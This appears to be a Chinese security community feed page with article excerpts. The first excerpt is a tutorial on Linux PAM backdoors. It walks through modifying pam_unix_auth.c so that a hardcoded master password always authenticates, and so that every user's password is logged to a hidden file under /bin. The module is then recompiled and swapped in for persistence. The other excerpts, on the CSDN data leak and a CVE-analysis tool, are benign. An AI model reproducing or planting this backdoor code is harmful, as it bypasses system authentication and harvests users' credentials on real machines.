Linux Pam后门总结拓展

前言 渐渐发现pam后门在实战中存在种植繁琐、隐蔽性不强等缺点,这里记录下学习pam后门相关知识和pam后门的拓展改进。 0x01 PAM Backdoor PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(位于/lib/security)进行安全认证 简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持 以下为Pam后门种植的过程,只是特别把一点tips和需要注意的点贴出来。 查询目标版本后下载对应源代码修改认证逻辑、编译替换原认证文件即可。版本务必要和目标系统完全保持对应。 源码:http://www.linux-pam.org/library/ 查询版本rpm -qa | grep pam tar -xzvf Linux-PAM-1.1.1.tar.gz cd Linux-PAM-1.1.1 cd modules/pam_unix/ vim pam_unix_auth.c pam_unix_auth.c 在这里你可以修改认证逻辑,改成使用特定密码的后门,当然也可以作为一个记录敏感密码的功能,将记录的密码写入文件记录。 /* verify the password of this user */ retval = _unix_verify_password(pamh name p ctrl); if(strcmp("qing!@#123"p)==0){return PAM_SUCCESS;} if(retval == PAM_SUCCESS){ FILE * fp; fp = fopen("/bin/.sshlog" "a"); fprintf(fp "%s : %s\n" name p); fclose(fp); } 这里也提一下,实际各种复杂环境还是推荐非交互去修改源码 apt-get install dpkg-dev 阅读全文 箭头
8个评论-3664个浏览
收藏 收藏

CSDN用户数据库泄漏事件暴露出整个行业的信息安全问题,国家、企业、个人将如何应对?

心野路子正: 我说说心里话,虽然不大好听: 对于中小型企业、个人网站来说,没有什么比人气、效益更重要的了,相比之下,程序员只要把一个能用的东西搭出来就行,安全与否实在是太末节的东西。不被显著地攻击一次,都不会想要把一点心思放到这上面来,更不用说资源。 事实上,据我所知,只有安全行业和金融会对这方面进行巨大的投入,因为数据对于他们来说就是一切。 数据库的不安全由来已久,以MySQL为最不安全,可是应用却是最广的,WAMP/LAMP的组合也十分便利。这次泄漏仅仅是被公开公布,被入侵应该是更早以前的事,中国最大的技术员论坛——2010年才升级为加密存储,这是多么可怕的事情。可是,在这十年中被攻击的网站数不胜数,站长们对于他人的教训从来都是“要加强自己的安全防护”,却很难付诸第二次行动甚至从来没有行动。 所以对于这个问题,我的答案是国家不至于会有什么动作,企业恐怕一切照旧、有实力的可能会进行一次数据库检查或升级,个人对自己的信息安全感到恐慌、上了一堂信息安全课,可是最终还是不了了之。 当然了,安全本来就和对抗是一对孪生兄弟,一定会互相促进发展的,呵呵。入侵——入侵得多了——防御——寻找新的入侵方式,这个循环几十年来不曾停过。 阅读全文 箭头
3个回答-3645个浏览
关注 关注 收藏 收藏

CVE-Flow:1999-2020年CVE数据分析【1】

给大家汇报一下最近工作,主要做了这么几个事情: 1999-2020年CVE数据分析。 增量CVE数据的T级监控。 EXP预警。 全局自动化。 产出及价值 汇总产出一份近20年来CVE原始数据集:CVE2020,且持续自动更新,具备66个属性。借助数据集,可以分析各个属性数据的外在表现,推测其内在规律,辅助安全工作。 经过交叉打标,产出带有EXP标记的CVE标记数据集:EXP2020,且持续自动更新。借助已有标记数据集,通过机器学习和深度学习算法训练,可以预测CVE被利用的可能性,有的放矢,提高预警时间。 基于以上工作,开发名为CVE-Flow的工具,实现历年来CVE数据的分析、增量CVE的T级监控、EXP预警和全局自动化功能,作为外部威胁情报,给攻防双方提供有价值的CVE数据和建议。 起源 在我写的博文中,经常会交代文章的“起源”,介绍写这篇文章的原因和其中思考的过程。这主要来源于早前在乌云看洞的时候,漏洞详情经常有果无因,只介绍了漏洞的触发点和利用方式,而最重要的如何发现这个触发点的过程却没有被提及,对于漏洞平台来说,要的是结果,而对于白帽子来说,更重要的可能是发现漏洞的过程,而这部分是缺失的,当然,这也可以理解,毕竟漏洞详情不是博文。 idea起源于目前的现状:从防的角度,做安全检测的场景和机器学习方法有一堆,但从攻的角度,机器学习的成功应用较为欠缺和有限。而从攻的角度来想,应用场景必然绕不开漏洞,那么问题也就变成了,机器学习在漏洞方面的应用。在dblp上使用vulnerability machine learning deep learning等关键字搜索,做了一下调研,发现大部分研究更偏向于学术型和研究型,能在工业界产生实际应用价值的很少,其中有一个比较有意思的应用是预测漏洞被利用的可能性。当时看到这个才发现我的思维定势,机器学习在漏洞方面的应用一定是指机器学习来挖洞吗?机器学习也可以应用在漏洞数据方面,可以做的事情是工程化”预测漏洞被利用的可能性“,为工业界服务。顺手在管理idea的仓库简要记录下了整个过程。 在这里给大家安莉下我的idea管理小本本,主要记录idea和TODO,找到适合自己的项目和时间管理工具很重要。 言归正传 阅读全文 箭头
5个评论-3956个浏览
收藏 收藏

DOM Clobbering重见天日

6个评论-3910个浏览
收藏 收藏
更多

加载中,请稍候

请求超时,点击重新加载

提问
写文章

装饰 推荐专栏

换一换

网络安全法律法规
Android应用安全
渗透训练营
晟凯科技

装饰 权威推荐

广东省应急响应平台
广东网警
广东省计算机信息网络安全协会
专栏
小密圈

装饰 安全达人

换一换

随風
知性的蜜蜂
0.7个小矮人
脸红
binbin发亮
偸吻月亮
你看我头大不大
搞灰机的小围